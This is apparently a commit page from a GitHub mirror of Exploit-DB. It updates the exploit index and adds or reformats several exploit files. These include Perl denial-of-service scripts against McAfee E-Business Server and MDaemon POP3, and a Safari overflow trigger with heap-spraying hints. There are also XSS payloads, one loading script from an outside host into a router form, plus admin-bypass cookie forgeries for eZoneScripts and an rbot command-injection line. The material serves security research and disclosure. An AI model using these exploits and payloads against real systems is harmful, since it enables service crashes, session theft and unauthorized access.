bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_02_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-02 04:39:03 +00:00
parent 48fef00530
commit ff9d2bfa96
11 changed files with 209 additions and 117 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

19
files.csv
View file

@ -443,7 +443,7 @@ id,file,description,date,author,platform,type,port
578,platforms/windows/dos/578.pl,"MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0
579,platforms/bsd/local/579.sh,"BSD bmon <= 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
580,platforms/linux/remote/580.c,"Monit <= 4.2 Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812
581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0
582,platforms/windows/remote/582.c,"YahooPOPs <= 1.6 SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25
583,platforms/windows/remote/583.pl,"SLX Server 6.1 Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0
584,platforms/windows/remote/584.c,"MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0
@ -694,7 +694,7 @@ id,file,description,date,author,platform,type,port
871,platforms/php/webapps/871.txt,"phpBB <= 2.0.12 Session Handling Authentication Bypass (tutorial 2)",2005-03-11,Ali7,php,webapps,0
872,platforms/php/webapps/872.pl,"SocialMPN Arbitrary File Injection Exploit",2005-03-11,y3dips,php,webapps,0
873,platforms/php/webapps/873.txt,"phpDEV5 - Remote Default Insecure Users Vuln",2005-03-11,Ali7,php,webapps,0
874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 ""3G-A11"" Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0
874,platforms/windows/dos/874.cpp,"Ethereal <= 0.10.9 ""3G-A11"" - Remote Buffer Overflow Exploit (2)",2005-03-12,"Leon Juranic",windows,dos,0
875,platforms/windows/remote/875.c,"Sentinel LM 7.x UDP License Service Remote Buffer Overflow Exploit",2005-03-13,class101,windows,remote,5093
876,platforms/linux/local/876.c,"PaX Double-Mirrored VMA munmap Local Root Exploit",2005-03-14,"Christophe Devine",linux,local,0
877,platforms/linux/local/877.pl,"Frank McIngvale LuxMan 0.41 Local Buffer Overflow Exploit",2005-03-14,"Kevin Finisterre",linux,local,0
@ -1938,7 +1938,7 @@ id,file,description,date,author,platform,type,port
2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0
2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0
2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0
2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0
2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0
2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0
2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0
2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0
@ -4517,7 +4517,7 @@ id,file,description,date,author,platform,type,port
4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0
4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates Local File Inclusion Vulnerability",2008-01-09,DSecRG,php,webapps,0
4877,platforms/multiple/remote/4877.txt,"SAP MaxDB <= 7.6.03.07 pre-auth Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210
4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0
4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote pre-auth Code Execution / DoS PoC",2008-01-09,"Leon Juranic",multiple,dos,0
4879,platforms/php/webapps/4879.php,"Docebo <= 3.5.0.3 (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0
4880,platforms/php/webapps/4880.php,"DomPHP <= 0.81 Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0
4881,platforms/solaris/dos/4881.c,"SunOS 5.10 Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0
@ -8917,7 +8917,7 @@ id,file,description,date,author,platform,type,port
9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) Remote SQL Injection Vulnerability",2009-08-18,Mr.SQL,php,webapps,0
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 (article) Blind SQL Injection Exploit",2009-08-18,Mr.SQL,php,webapps,0
9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection Vuln",2009-08-18,Mr.SQL,php,webapps,0
9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0
9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BOF PoC",2009-08-18,"Leon Juranic",multiple,dos,0
9455,platforms/windows/dos/9455.html,"MS Internet Explorer (Javascript SetAttribute) Remote Crash Exploit",2009-08-18,"Irfan Asrar",windows,dos,0
9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem Arbitrary Add Admin User Vulnerability",2009-08-18,SuNHouSe2,hardware,remote,0
9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a (.mp3 File) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0
@ -22877,7 +22877,7 @@ id,file,description,date,author,platform,type,port
25785,platforms/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injection Vulnerabilities",2005-06-02,"Dedi Dwianto",asp,webapps,0
25786,platforms/php/webapps/25786.txt,"MWChat 6.7 Start_Lobby.PHP Remote File Include Vulnerability",2005-06-03,Status-x,php,webapps,0
25787,platforms/php/webapps/25787.txt,"LiteWeb Server 2.5 Authentication Bypass Vulnerability",2005-06-03,"Ziv Kamir",php,webapps,0
25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0
25788,platforms/php/webapps/25788.txt,"Popper Webmail 1.41 - ChildWindow.Inc.PHP Remote File Include Vulnerability",2005-06-03,"Leon Juranic",php,webapps,0
25789,platforms/linux/local/25789.c,"FUSE 2.2/2.3 - Local Information Disclosure Vulnerability",2005-06-06,"Miklos Szeredi",linux,local,0
25790,platforms/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 LOGIN.ASP SQL Injection Vulnerability",2005-06-06,Romty,asp,webapps,0
25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 Remote Denial of Service Vulnerability",2005-06-06,"Luigi Auriemma",multiple,dos,0
@ -27999,7 +27999,7 @@ id,file,description,date,author,platform,type,port
31201,platforms/php/webapps/31201.txt,"artmedic webdesign weblog Multiple Local File Include Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0
31202,platforms/php/webapps/31202.txt,"PlutoStatus Locator 1.0pre alpha 'index.php' Local File Include Vulnerability",2008-02-14,muuratsalo,php,webapps,0
31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability",2008-02-15,"Carl Hardwick",multiple,dos,0
31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0
31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 - Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0
31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component - 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
@ -30559,3 +30559,8 @@ id,file,description,date,author,platform,type,port
33926,platforms/windows/dos/33926.py,"ddrLPD 1.0 Remote Denial of Service Vulnerability",2010-04-29,"Bisphemol A",windows,dos,0
33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script 'listtest.php' SQL Injection Vulnerability",2010-02-09,JIKO,php,webapps,0
33929,platforms/multiple/remote/33929.py,"Gitlist <= 0.4.0 - Remote Code Execution",2014-06-30,drone,multiple,remote,0
33933,platforms/php/webapps/33933.txt,"ThinkPHP 2.0 'index.php' Cross Site Scripting Vulnerability",2010-02-09,zx,php,webapps,0
33934,platforms/php/webapps/33934.txt,"eZoneScripts Multiple Scripts Insecure Cookie Authentication Bypass Vulnerability",2009-02-09,JIKO,php,webapps,0
33935,platforms/windows/remote/33935.txt,"rbot 0.9.14 - '!react' Command Unauthorized Access Vulnerability",2010-02-24,nks,windows,remote,0
33937,platforms/multiple/webapps/33937.txt,"TYPO3 't3m_cumulus_tagcloud' Extension 1.0 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-05-05,MustLive,multiple,webapps,0
33938,platforms/hardware/remote/33938.txt,"Sterlite SAM300 AX Router 'Stat_Radio' Parameter Cross-Site Scripting Vulnerability",2010-02-04,"Karn Ganeshen",hardware,remote,0

Can't render this file because it is too large.

28
platforms/hardware/remote/33938.txt Executable file
View file

@ -0,0 +1,28 @@
source: http://www.securityfocus.com/bid/39928/info
The Sterlite SAM300 AX Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
*+POST Request+*
POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7)
Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101
*+POST Parameters+*
Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org
%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH
*+Impact+*

6
platforms/linux/remote/581.c
View file

@ -58,6 +58,6 @@ printf (" %d |",dist);
}
printf ("\nAvrg: %d\n",(stat/PROBE));
close (sock);
}
// milw0rm.com [2004-10-17]
}
// milw0rm.com [2004-10-17]

50
platforms/multiple/dos/4878.pl
View file

@ -1,25 +1,25 @@
#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC)
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>,
# Infigo IS <http://www.infigo.hr/en/>
#
use IO::Socket;
$saddr = "192.168.1.3";
$sport = 1718;
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;
# milw0rm.com [2008-01-09]
#!/usr/bin/perl
#
#
# McAfee(R) E-Business Server(TM) 8.5.2 Remote preauth crash (PoC)
#
# - tested on Windows and Linux
#
#
# Leon Juranic <leon.juranic@infigo.hr>,
# Infigo IS <http://www.infigo.hr/en/>
#
use IO::Socket;
$saddr = "192.168.1.3";
$sport = 1718;
$exp1 = "\x01\x3f\x2f\x05\x25\x2a" . "A" x 69953;;
print "> Sending exploit string...\n";
my $server_sock = IO::Socket::INET->new (PeerAddr => $saddr, PeerPort => $sport) || die ("Cannot connect to server!!!\n\n");
print $server_sock $exp1;
# milw0rm.com [2008-01-09]

78
platforms/multiple/dos/9454.txt
View file

@ -1,39 +1,39 @@
Three weeks ago, I coded a nice little browser fuzzer, and started
playing with various browsers: IE, Firefox, Safari, Chrome, Opera...
I found an interesting Safari crash after couple of hours of fuzzing.
It was a stack overflow (and a smile on my face). Since then, every now
and then I took some time to play with it.
Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3.
Among some other vulnerabilities, this vulnerability has also been fixed.
The Apple announcement is available at
http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html.
Depends on the perspective, but from my own - Very Bad Luck. C'est la vie,
things like this happen... Some bugs die young.
This simple and interesting vulnerability is located in WebKit's
JavaScript code that parses floating point numbers. It can be triggered
with script like this:
---------
<script>
var Overflow = "31337" + 0.313373133731337313373133731337...;
</script>
---------
Or something like this...
---------
<img width=0.3133731337313373133731337... src="31337.jpg">
---------
Play little bit with numbers to get a desirable return address, little
bit of heap spraying, and it works.
Regards,
Leon Juranic
# milw0rm.com [2009-08-18]
Three weeks ago, I coded a nice little browser fuzzer, and started
playing with various browsers: IE, Firefox, Safari, Chrome, Opera...
I found an interesting Safari crash after couple of hours of fuzzing.
It was a stack overflow (and a smile on my face). Since then, every now
and then I took some time to play with it.
Today, I noticed that Apple updated Safari 4.0.2 to 4.0.3.
Among some other vulnerabilities, this vulnerability has also been fixed.
The Apple announcement is available at
http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html.
Depends on the perspective, but from my own - Very Bad Luck. C'est la vie,
things like this happen... Some bugs die young.
This simple and interesting vulnerability is located in WebKit's
JavaScript code that parses floating point numbers. It can be triggered
with script like this:
---------
<script>
var Overflow = "31337" + 0.313373133731337313373133731337...;
</script>
---------
Or something like this...
---------
<img width=0.3133731337313373133731337... src="31337.jpg">
---------
Play little bit with numbers to get a desirable return address, little
bit of heap spraying, and it works.
Regards,
Leon Juranic
# milw0rm.com [2009-08-18]

14
platforms/multiple/webapps/33937.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/39926/info
TYPO3 't3m_cumulus_tagcloud' extension is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
TYPO3 't3m_cumulus_tagcloud' version 1.0 is affected; other versions may be vulnerable as well.
Example URIs are available:
http://www.example.com/modules/mod_joomulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://www.example.com/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

9
platforms/php/webapps/33933.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39909/info
ThinkPHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ThinkPHP 2.0 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?s=1%3Cbody+onload=alert(1)%3E

27
platforms/php/webapps/33934.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/39912/info
eZoneScripts Banner Exchange Website, Adult Banner Exchange Website, Apartment Search Script, phpMiniSite Script, and Classified Ultra Script are prone to an authentication-bypass vulnerability because they fail to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
The following example cookie data is available:
Banner Exchange Website and Adult Banner Exchange Website:
javascript:document.cookie="bannerexchangename=admin; path=/";
javascript:document.cookie="bannerexchangerand=905; path=/";
Classified Ultra Script:
javascript:document.cookie="AdminPass=1; path=/productdemos/ClassifiedUltra/Site_Admin/";
Apartment Search Script:
javascript:document.cookie="SiteAdminPass=1; path=/productdemos/ApartmentSearch/Site_Admin/";
phpMiniSite Script:
javascript:document.cookie="auth=fook; path=/";

80
platforms/windows/dos/2245.pl
View file

@ -1,40 +1,40 @@
#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
#
#
$host = '192.168.0.105';
use IO::Socket;
for ($x = 0 ; $x < 12 ; $x++)
{
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A" x 160 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "QUIT\r\n";
recv ($sock, $var, 10000,0);
print $var;
close ($sock);
sleep(1);
}
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\'A" x 337 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
sleep(2);
# milw0rm.com [2006-08-22]
#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
#
#
$host = '192.168.0.105';
use IO::Socket;
for ($x = 0 ; $x < 12 ; $x++)
{
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A" x 160 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "QUIT\r\n";
recv ($sock, $var, 10000,0);
print $var;
close ($sock);
sleep(1);
}
$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp')
|| die "socket error\n\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
print $sock "USER " . "\'A" x 337 . "\r\n";
recv ($sock, $var, 10000,0);
print $var;
sleep(2);
# milw0rm.com [2006-08-22]

6
platforms/windows/dos/874.cpp
View file

@ -78,6 +78,6 @@ main (int argc, char **argv)
{
xp_sendpacket(argv[1]);
}
// milw0rm.com [2005-03-12]
}
// milw0rm.com [2005-03-12]

9
platforms/windows/remote/33935.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39915/info
Rbot is prone to an unauthorized-access vulnerability because it fails to adequately sanitize user supplied data.
An attacker can exploit this vulnerability to gain administrative rights to the rbot application. This will allow a remote attacker to execute Ruby code within the context of the affected application; other attacks may be possible.
rbot 0.9.14 is vulnerable; other versions may also be affected.
<attacker> !react to /attacker:.*/ with cmd:whoami